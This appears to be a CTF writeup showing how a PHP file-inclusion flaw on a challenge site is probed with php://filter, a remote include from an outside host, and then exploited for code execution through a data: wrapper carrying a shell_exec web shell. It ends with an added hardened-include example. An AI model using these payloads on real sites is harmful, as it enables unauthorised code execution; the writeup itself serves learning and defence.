@Xartrick
Last active December 23, 2018 13:43
Santhacklaus CTF 2018 · 3D Industry (1/2) Writeup

Description

3D Industry is a freshly launched startup which is specialized in 3D printing. The CEO has some doubts about the secure development of the website. Can you prove to him that his doubts are well-founded?

Step-by-step

We're facing a website with a single entrypoint, index.php. Each page is loaded through the GET parameter file, which takes one of the following values:

  • services.php
  • creations.php
  • contact.php

The first thing to try is a Local File Inclusion (LFI) using the php://filter wrapper to read the source of the included files, but without success.

https://3d-industry.santhacklaus.xyz/index.php?file=php://filter/convert.base64-encode/resource=services.php

The second attempt is a Remote File Inclusion (RFI) of a file hosted on an external server; still nothing.

https://3d-industry.santhacklaus.xyz/index.php?file=https://tapz.eu/evil_script.txt

After searching on the Internet, I came across a technique to obtain Remote Code Execution (RCE), still using wrappers.

https://3d-industry.santhacklaus.xyz/index.php?file=data:text/plain;base64,PD9waHAgZWNobyhzaGVsbF9leGVjKCRfR0VUWydjbWQnXSkpOw==&cmd=id

The base64-encoded string in the data: wrapper decodes to a small PHP script that executes the command passed in the GET parameter cmd:

<?php echo(shell_exec($_GET['cmd']));

The included script is executed by index.php, and we're now able to run commands on the server.

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ ls -la

total 68
dr-xr-xr-x 8 1001 1001 4096 Dec 12 08:33 .
drwxr-xr-x 1 root root 4096 Dec 14 19:15 ..
-r-xr-xr-x 1 1001 1001 8196 Dec 12 08:33 .DS_Store
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 .hidden
-r-xr-xr-x 1 1001 1001  267 Dec 12 08:33 accueil.php
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 admin
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 config
-r-xr-xr-x 1 1001 1001  448 Dec 12 08:33 contact.php
-r-xr-xr-x 1 1001 1001  996 Dec 12 08:33 creations.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 inc
-r-xr-xr-x 1 1001 1001  580 Dec 12 08:33 index.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 lang
-r-xr-xr-x 1 1001 1001  125 Dec 12 08:33 lang.php
-r-xr-xr-x 1 1001 1001  461 Dec 12 08:33 services.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 style

$ ls -la .hidden

total 20
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 .
dr-xr-xr-x 8 1001 1001 4096 Dec 12 08:33 ..
-r-xr-xr-x 1 1001 1001 6148 Dec 12 08:33 .DS_Store
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 this

[..]

$ ls -la .hidden/this/is/the/path/to/the/flag/

total 12
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 .
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 ..
-r-xr-xr-x 1 1001 1001   70 Dec 12 08:33 flag.txt

$ cat .hidden/this/is/the/path/to/the/flag/flag.txt

Well done ! You can validate with the flag:

IMTLD{B3w4r30fURL1nclud3}
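As an added illustration (not code from the challenge or from this writeup), here is the unvalidated include pattern the challenge exploits beside a hardened dispatcher; the page names come from the listing above, and the accueil.php default is an assumption:

```php
<?php
// Added example (not the challenge's real index.php): the unvalidated include
// the writeup exploits, next to a hardened version of the same dispatcher.

// VULNERABLE: the raw ?file= value reaches include(). With allow_url_include=On
// PHP accepts data: and http(s): wrappers here, which is what turns the
// file-inclusion probe into remote code execution.
function load_page_vulnerable(array $get): void
{
    include($get['file']);   // file=data:text/plain;base64,... runs attacker PHP
}

// HARDENED: the request value is only ever used as an array key. The path that
// reaches include() comes from this table, so wrappers (php://, data:, https://)
// and traversal (../) never form part of it. Keys are the page names the site
// already uses; the accueil.php default is an assumption based on the listing.
const PAGES = [
    'accueil.php'   => __DIR__ . '/accueil.php',
    'services.php'  => __DIR__ . '/services.php',
    'creations.php' => __DIR__ . '/creations.php',
    'contact.php'   => __DIR__ . '/contact.php',
];

// Returns the on-disk path for a known page name, or null for anything else.
function resolve_page(?string $name): ?string
{
    if ($name === null || $name === '') {
        $name = 'accueil.php';
    }
    return PAGES[$name] ?? null;
}

function load_page_hardened(array $get): void
{
    $path = resolve_page($get['file'] ?? null);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include($path);
}

// Defence in depth, in php.ini: allow_url_include=Off (the default) makes
// include() reject data: and remote URLs even if validation slips; note it does
// not stop php://filter, so the allowlist above is what actually closes the hole.
```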

Resources
